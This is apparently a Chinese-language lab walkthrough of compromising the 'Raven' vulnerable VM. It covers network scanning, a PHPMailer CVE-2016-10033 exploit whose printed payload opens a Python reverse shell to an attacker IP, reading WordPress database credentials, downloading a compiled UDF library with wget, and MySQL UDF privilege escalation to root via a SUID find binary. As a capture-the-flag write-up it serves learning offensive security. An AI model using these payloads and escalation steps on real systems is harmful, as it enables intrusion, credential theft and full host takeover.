主机发现

root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.1.1 e0:45:6d:c8:43:79   (Unknown)
192.168.1.32    00:0c:29:12:96:8f   VMware, Inc.
192.168.1.15    08:d4:0c:85:f2:8c   Intel Corporate
192.168.1.50    70:85:40:a7:03:eb   (Unknown)
192.168.1.51    08:d4:0c:85:f2:8c   Intel Corporate
192.168.1.69    38:53:9c:99:f2:da   (Unknown)
192.168.1.229   f0:18:98:04:80:24   (Unknown)
192.168.1.92    28:fa:a0:9f:94:5f   (Unknown)

8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.285 seconds (112.04 hosts/sec). 8 responded

192.168.1.32发现靶机。

端口探测

root@kali:~# nmap -A 192.168.1.32
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-28 08:07 EST
Nmap scan report for Raven (192.168.1.32)
Host is up (0.00052s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
|   2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
|   256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_  256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          59830/udp  status
|_  100024  1          60361/tcp  status
MAC Address: 00:0C:29:12:96:8F (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms Raven (192.168.1.32)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.37 seconds

发现2280111端口是开放的,其中80端口运行了一个web应用。

目录猜解

使用dirb进行目录扫描

root@kali:~# dirb http://192.168.1.32

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Nov 28 08:20:15 2018
URL_BASE: http://192.168.1.32/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.32/ ----
==> DIRECTORY: http://192.168.1.32/css/                                        
==> DIRECTORY: http://192.168.1.32/fonts/                                      
==> DIRECTORY: http://192.168.1.32/img/                                        
+ http://192.168.1.32/index.html (CODE:200|SIZE:16819)                         
==> DIRECTORY: http://192.168.1.32/js/                                         
==> DIRECTORY: http://192.168.1.32/manual/                                     
+ http://192.168.1.32/server-status (CODE:403|SIZE:300)                        
==> DIRECTORY: http://192.168.1.32/vendor/                                     
==> DIRECTORY: http://192.168.1.32/wordpress/

扫到几个一级目录,一个个查看下文件的内容。

/vendor/目录下发现了两个有趣的东西:

http://192.168.1.32/vendor/PATH

可以看到flag1和绝对路径。

http://192.168.1.32/vendor/VERSION

同时目录下还存在一个PHPMailerAutoload.php的文件,配合起来看应该是使用了5.2.16版本的PHPMailer。

反弹SHELL

然后exploit-db.com搜索一波,发现了这个exp:

https://www.exploit-db.com/exploits/40974

简单修改一下exp:

  1. 顶部加上# -*- coding: utf-8 -*-声明,否则注释里一大堆非ASCII字符会报错。

  2. 修改target为靶机IP地址,利用文件为contact.php

  3. 修改后门文件路径名称。也不知道为什么,用默认的backdoor.php总是利用不成功,把payload一顿瞎改还是不行,最后改成了shell.php居然就可以了=_=

  1. 修改反弹shell的地址为nc监听服务器的ip和端口。

然后执行exp

~/Downloads
▶ python 40974.py


 █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗
██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗
███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝
██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗
██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║
╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝
      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com
 Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski

<MultipartEncoder: {'action': 'submit', 'message': 'Pwned', 'name': '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.1.30\\\',8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);"""\'); ?>', 'email': '"anarcoder\\" -OQueueDirectory=/tmp -X/var/www/html/backdoor.php server" @protonmail.com'}>
[+] SeNdiNG eVIl SHeLL To TaRGeT....
[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D
[+]  ExPLoITeD http://192.168.1.32/contact.php

访问contact.php

此时就会生成后门文件shell.php,开启nc服务器监听,访问靶机的shell.php,在服务器上得到反弹shell。

root@kali:~# nc -lvvp 8888
listening on [any] 8888 ...
connect to [192.168.1.30] from Raven [192.168.1.32] 35173
/bin/sh: 0: can't access tty; job control turned off
$

查看一下文件,在/wordpress/wp-config.php得到数据库的密码。

$ ls
Security - Doc
about.html
contact.php
contact.zip
css
elements.html
fonts
img
index.html
js
scss
service.html
shell.php
team.html
vendor
wordpress
$ cd wordpress  
$ ls
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
$ cat wp-config.php

查看一下mysql的运行权限:

$ ps -ef|grep mysql
root        556      1  0 02:18 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
root        925    556  0 02:18 ?        00:00:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
www-data   1138   1123  0 02:29 ?        00:00:00 grep mysql

是以root的身份运行的,可以考虑通过mysql提权。

UDF提权

nc模式下的shell不支持su交互,先利用python提升到伪终端。

$ python -c "import pty;pty.spawn('/bin/bash')"

然后登入mysql,交互正常。

接着就是利用提权exp的利用了。

https://www.exploit-db.com/exploits/1518

参照注释一步步走。

  • 编译生成so文件。
root@kali:~# gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.c -lc
root@kali:~# ls
40974.py  Documents  Music     Public         raptor_udf2.so  Videos
Desktop   Downloads  Pictures  raptor_udf2.c  Templates
  • 从服务器下载so文件。
www-data@Raven:/var/www/html/wordpress$ cd /tmp
cd /tmp
www-data@Raven:/tmp$ wget 192.168.1.30/raptor_udf2.so
wget 192.168.1.30/raptor_udf2.so
converted 'http://192.168.1.30/raptor_udf2.so' (ANSI_X3.4-1968) -> 'http://192.168.1.30/raptor_udf2.so' (UTF-8)
--2018-11-30 03:29:34--  http://192.168.1.30/raptor_udf2.so
Connecting to 192.168.1.30:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19160 (19K) [application/octet-stream]
Saving to: 'raptor_udf2.so'

raptor_udf2.so      100%[=====================>]  18.71K  --.-KB/s   in 0s     

2018-11-30 03:29:34 (286 MB/s) - 'raptor_udf2.so' saved [19160/19160]
  • 执行sql语句,其中dumpfile的路径要根据前面进程列出来的plugin目录(plugin-dir=/usr/lib/mysql/plugin)改动一下。
mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed

mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.02 sec)

mysql> insert into foo values(load_file('/tmp/raptor_udf2.so'));       
insert into foo values(load_file('/tmp/raptor_udf2.so'));
Query OK, 1 row affected (0.01 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
<to dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';                         
Query OK, 1 row affected (0.00 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)
  • 利用自定义函数改变命令权限
select do_system('chmod u+s /usr/bin/find');

然后就可以利用find顺利提权了。

www-data@Raven:/tmp$ touch finn
touch finn

www-data@Raven:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@Raven:/tmp$ find finn -exec "/bin/sh" \;
find finn -exec "/bin/sh" \;

# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# whoami
whoami
root

打完收工。

点击收藏 | 2 关注 | 1
登录 后跟帖